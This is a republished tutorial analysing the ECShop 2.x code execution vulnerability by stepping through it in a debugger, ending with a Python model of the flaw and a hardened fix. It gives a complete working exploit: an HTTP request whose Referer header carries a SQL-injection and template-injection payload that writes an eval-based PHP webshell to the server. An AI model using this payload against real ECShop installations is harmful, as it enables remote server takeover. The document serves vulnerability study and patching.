2025-04-02 Update. From: SLTechnology News & Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
This article walks through a dynamic-debugging analysis of the ECShop 2.x code execution vulnerability. Many newcomers are unclear about how to approach this, so the steps below explain it in detail for anyone who needs them; I hope you gain something from it.
First, background
ECShop is known as the largest open-source online store system in China. This vulnerability lets a remote attacker write a webshell directly to the server through the Referer header of the login page.
This article analyses every detail of the vulnerability by dynamic analysis, so the principle can be seen clearly. The focus is on dynamic analysis and auditing technique, and on how to debug the vulnerability; the vulnerability itself is also worth studying, because constructing this attack chain requires understanding every link in it.
Second, building the dynamic debugging environment
Download and install phpStudy and PhpStorm.
First confirm the PHP version in use.
Then modify the configuration file. Add the following to php.ini (the paths are those of the phpStudy install used here; the zend_extension line points at the Xdebug DLL for the php53 build, and the IDE key and port must match what is configured in PhpStorm):
    [XDebug]
    xdebug.profiler_append = 0
    xdebug.profiler_enable = 1
    xdebug.profiler_enable_trigger = 0
    xdebug.profiler_output_dir = "C:\phpStudy\tmp\xdebug"
    xdebug.trace_output_dir = "C:\phpStudy\tmp\xdebug"
    xdebug.profiler_output_name = "cache.out.%t-%s"
    xdebug.remote_enable = 1
    xdebug.remote_handler = "dbgp"
    xdebug.remote_host = "127.0.0.1"
    zend_extension = "C:\phpStudy\php53\ext\xdebug.dll"
    xdebug.remote_port = 9000
    xdebug.idekey = PHPSTROM
Set the PHP version in phpStudy; it must match the version the Xdebug extension was built for.
The PhpStorm debugger settings can be left at their defaults.
Then change the IDE key and port in PhpStorm to match php.ini (PHPSTROM and 9000).
Configure the project root for the debug server here.
Select Chrome as the browser.
Install the JetBrains IDE Support extension in Chrome; no further configuration changes are needed, and with that the environment is basically ready.
Third, dynamic debugging and analysis of the vulnerability
Dynamic analysis follows; its advantage is that the vulnerability analysis becomes much clearer.
Set a breakpoint at the starting point of the vulnerability so that every detail can be followed, then click Debug.
The browser opens. Click Login: this triggers the breakpoint, and execution stops there.
Here are the keyboard shortcuts used:
F7 (Step Into): follows the call into the function.
F8 (Step Over): executes one line without entering the function; use it for loops or functions you do not want to look at.
Shift+F8 (Step Out): jumps back out after entering a function.
Ctrl+Alt+click on a function: jumps to its implementation.
Alt+F7 (Find Usages): searches for who calls the function or uses the variable.
These are the ones I use most often; once they are mastered, debugging is straightforward.
Here the HTTP_REFERER header, which the attacker controls, is assigned to $back_act.
Use Burp to capture the request and test the vulnerability; first, analyse the payload.
    554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
The leading string 554fcae493e564ee0dc75bdf2ebf94caads has two parts. The first, 554fcae493e564ee0dc75bdf2ebf94ca, is a hash: it is checked for and then stripped, and without it the attack chain cannot be entered (the dynamic analysis of this is shown later). The second, ads, steers the dynamic call into the insert_ads function. What follows the | is a serialized PHP array with the two parameters insert_ads uses, num and id.
The hex string in the ninth column of the union select decodes to the template fragment below, and the base64 inside it decodes to file_put_contents('1.php','<?php eval($_POST[1337]); ?>'), which is what assert() executes:
    {$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//}xxx
Send the request:
    GET /upload/user.php?act=login HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Cookie: ECS_ID=3e839434a217e8c1f2a931f70086935a43141a6d; ECS[visit_times]=1
    Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
    Connection: close
    Upgrade-Insecure-Requests: 1
The response shows that the webshell (1.php) has been written.
Now continue debugging: step over (F8) all the way to here, then step into (F7) to have a look.
The key point here is insert_mod, which is called dynamically. Because this debugging session is not driven by capturing and replaying the payload request, the variables have to be modified by hand in the debugger so that execution follows the payload's attack chain, in which insert_ads must be reached. Before that there is a hash check.
As shown below, the hash is present in the output, so there is nothing to control at this point; continue.
The hash is stripped in the next step: after explode() on the hash, the odd-indexed elements of $k (1, 3, 5, 7) are the attacker-controlled pieces. So change element 1 to the payload: right-click it and choose Set Value.
Paste the payload into Set Value. Pasting it verbatim produces an error, so it needs a small edit: escape the double quotes.
    ads|a:2:{s:3:\"num\";s:280:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}
Continue with F7 into insert_mod. The insert_ads call is now under our control, but when the payload is unserialized $para is false, meaning something is wrong with the payload as it was set. Click Debug to start over.
Change the position: set the value just before the unserialize call. As shown below, $para now has a value, and it is our payload.
Continue into insert_ads, stepping over (F8) until the payload's num value is spliced into the SQL.
The spliced query ends up containing the injected union select.
Keep stepping over (F8) down to here.
Step into (F7) and have a look: the payload is passed to _eval, the code-execution function, but it is first processed by fetch_str; step into that with F7 as well.
Stepping over (F8) to here: $source is unchanged up to this point; the following preg_replace processes the { ... } tag.
The tag body, $asd'];assert..., is handed to select().
The debugger cannot step into select() here (it is invoked from inside preg_replace), so this part is analysed statically; use Ctrl+Shift+F (Find in Path) to locate it.
In select, get_val is entered and substr strips the leading $.
The payload becomes: asd'];assert...
This then enters make_var,
which does the final splicing.
Eventually the payload becomes:
    $this->_var['asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//']
The ' and ] of the payload close the quoted array index that make_var opened, the assert() call follows as a separate statement, and the trailing // comments out the ']. that make_var appends.
Finally execution reaches the eval. One more step here executes the payload and writes the shell.
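The following Python model reproduces the template-engine steps just walked through (fetch_str, select, get_val, make_var) on the position_style fragment, so the quote breakout can be seen end to end, and places a hardened make_var beside the vulnerable one. This is an added example, not ECShop's code: the tag regex, the '<?php echo ...; ?>' wrapper emitted by select and the fix itself are my own assumptions and illustration; the $this->_var['asd'] splicing is what the debugging above observes.

```python
"""Model of the template-engine chain walked through above:
fetch_str -> select -> get_val -> make_var -> _eval.

Added example, not ECShop's code.  The tag regex and the '<?php echo ...; ?>'
wrapper are assumptions about the engine's behaviour; the
"$this->_var['name']" output of make_var is what the article observes.
make_var_hardened() is an illustrative fix, not ECShop's official patch.
"""
import re

VAR_PREFIX = "$this->_var"

# Fragment from the ninth UNION column, as decoded in the article.
POSITION_STYLE = ("{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywn"
                  "PD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//}xxx")


def make_var(name, prefix=VAR_PREFIX):
    """Vulnerable: the name is dropped into a quoted array index without validation."""
    return "%s['%s']" % (prefix, name)


def make_var_hardened(name, prefix=VAR_PREFIX):
    """Illustrative fix: a template variable name may only contain identifier characters."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", name):
        raise ValueError("invalid template variable name: %r" % name)
    return make_var(name, prefix)


def get_val(val, var_fn):
    """get_val(): the article's tag has no '.' or '|' parts, so the name goes straight to make_var."""
    return var_fn(val)


def select(tag, var_fn=make_var):
    """select(): for a '$' tag, strip the '$' and wrap the lookup in an echo (assumed form)."""
    if tag.startswith("$"):
        return "<?php echo " + get_val(tag[1:], var_fn) + "; ?>"
    return "{" + tag + "}"   # other tag kinds are not modelled here


def fetch_str(source, var_fn=make_var):
    """fetch_str(): every {...} tag (no nested braces, no newline) is handed to select()."""
    return re.sub(r"\{([^{}\n]*)\}", lambda m: select(m.group(1), var_fn), source)


def compile_vulnerable():
    """The PHP that _eval would receive for the injected position_style."""
    return fetch_str(POSITION_STYLE)


def compile_hardened():
    """Same input through the hardened make_var: the fragment is rejected before any PHP is built."""
    try:
        return fetch_str(POSITION_STYLE, make_var_hardened)
    except ValueError as e:
        return "rejected: %s" % e


if __name__ == "__main__":
    print(compile_vulnerable())
    print(compile_hardened())
```

In the vulnerable output the first statement is the harmless $this->_var['asd'] lookup; everything after the ]; is attacker code, and the trailing // swallows the '] and leaves the ; ?> that select appends. Validating the name, as make_var_hardened does, stops the breakout at the point where untrusted text is turned into PHP syntax rather than relying on the SQL layer never being injected.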